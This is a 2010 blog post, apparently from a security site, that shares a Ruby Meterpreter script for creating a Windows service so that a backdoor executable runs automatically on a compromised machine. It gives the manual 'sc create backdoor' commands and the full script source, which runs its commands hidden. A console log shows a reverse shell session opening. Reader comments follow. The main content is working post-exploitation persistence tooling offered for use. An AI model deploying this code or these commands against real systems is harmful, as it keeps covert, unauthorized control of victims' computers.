Meterpreter Script – Windows Service Creator

There are several ways to Backdoor a machine that has been compromised, One of them is placing your executable as a windows service.
The advantages are that user doesn’t have to log on in order for the service to run, non like placing it in the startup via registry which requires user to log in.

Doing it manually…

1. Create the service

sc create backdoor binPath= "cmd /K start c:\windows\system32\backdoor.exe" start= auto error= ignore

2. Start the service

net start backdoor

This method should work on both Win XP and Win 7, The only disadvantage is that this command requires administrative or system privileges.
Metasploit comes with many useful meterpreter scripts, I was surprised that it does not include an automated way to create a system service,

I decided to create one on my own and share it with ya all.

I would like to thank Humble Desser for tweaking the script and adding the ability to use service names with spaces and a service description.

hope you’ll find it useful

meterpreter > getuid
Server username: COMPUTER\Administrator

meterpreter > run sc -n "metasploit service" -d "reverse shell meterpreter service" -p c:\\pay.exe
[*] Creating Service meter...
[*] Starting the meter Service...
[*] Service meter Successfully Created...
meterpreter >
[*] Sending stage (749056 bytes) to 192.168.1.107
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.107:1091) at 2010-10-16 14:56:23 +0200

Meterpreter Script – Windows Service Creator from NightRanger on Vimeo.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# @Author: NightRanger, exploit.co.il
# @Created on: Oct 16, 2010
########################################
# Added -d "Service Description"
# Added -n "Service Payload with Spaces"
# humble-desser
########################################
session = client

@@exec_opts = Rex::Parser::Arguments.new(
    "-n" => [ true,  "Service Name." ],
    "-d" => [ true,  "Service Description."],
    "-p" => [ true,  "Service Executable Path (i.e: c:\\\\windows\\\\system32\\\\payload.exe)." ],
    "-h" => [ false, "Help Menu." ]
)  

def usage
    print_line("")
    print_line("****************************")
    print_line("* Windows Service Creator  *")
    print_line("*  Author:  NightRanger    *")
    print_line("*   shai@exploit.co.il     *")
    print_line("****************************")
    print_line('run sc -n "Service Name" -d "Service Description" -p c:\\\\windows\\\\system32\\\\payload.exe')
    print(@@exec_opts.usage)
    raise Rex::Script::Completed
end


def sc_add(session,sc_name,sc_exec,sc_desc)
    print_status("Creating Service #{sc_name}...")
    session.sys.process.execute("cmd /c sc create \"#{sc_name}\" binPath= \"cmd /K start #{sc_exec}\" start= auto error= ignore", nil, {'Hidden' => true, 'Channelized' => false})
    print_status("Starting the \"#{sc_name}\" Service...")
    session.sys.process.execute("cmd /c sc description \"#{sc_name}\" \"#{sc_desc}\" ", nil, {'Hidden' => true, 'Channelized' => false})
    print_status("Adding Description \"#{sc_desc}\"to the Service...")
    session.sys.process.execute("cmd /c net start \"#{sc_name}\"", nil, {'Hidden' => true, 'Channelized' => false})
    print_status("Service #{sc_name} Successfully Created...")
end

sc_name  = nil
sc_exec = nil
sc_desc = nil
@@exec_opts.parse(args) { |opt, idx, val|
    case opt
       when "-h"
        print(@@exec_opts.usage)
            break
         when "-n"
            sc_name = val
         when "-d"
        sc_desc = val
         when "-p"
            sc_exec = val
        end
}

if sc_name
    sc_add(session,sc_name,sc_exec,sc_desc)
else
    usage
end

Download The Script here:

sc.tar.gz
You need to login to access to the attachmentsTitle: sc.tar.gz (11 clicks)
Caption: Meterpreter Script - Windows Service Creator
Filename: sc.tar.gz
Size: 860 B

Post to Twitter

11 Comments


  1. cP
    Oct 16, 2010

    Nice job :)


  2. Mario Vilas
    Oct 18, 2010

    “Attachment restricted to registered users only”

    :(


  3. NightRanger
    Oct 18, 2010

    Added script source in the codebox.


  4. Trancer
    Oct 19, 2010

    Very nice, thank you. Why won’t you send it to the Metasploit guys so they add it to the framework?


  5. Trancer
    Oct 19, 2010

    BTW, I suggest you check this post out by jcran:
    http://blog.0x0e.org/2010/10/17/364/


  6. NightRanger
    Oct 19, 2010

    Thanks,

    I just haven’t had the time to check it out yet…

    http://www.metasploit.com/redmine/projects/framework/roadmap#Metasploit%203.5.0
    Feature #406: Full Java Payload Support


  7. NightRanger
    Oct 19, 2010

    Will do :)


  8. AbO-Ra3d
    May 29, 2011

    than U :D but pleases attachment the command
    Meterpreter Script – Windows Service Creator … what mean … i can hack xp without send server ?


  9. NightRanger
    May 29, 2011

    No, After you get a meterpreter session it allows you to add a service to target machine.

  10. [...] http://exploit.co.il/hacking/meterpreter-script-windows-service-creator/ VN:F [1.9.10_1130]please wait…Rating: 0.0/5 (0 votes cast)VN:F [1.9.10_1130]Rating: 0 (from 0 [...]

Recent Posts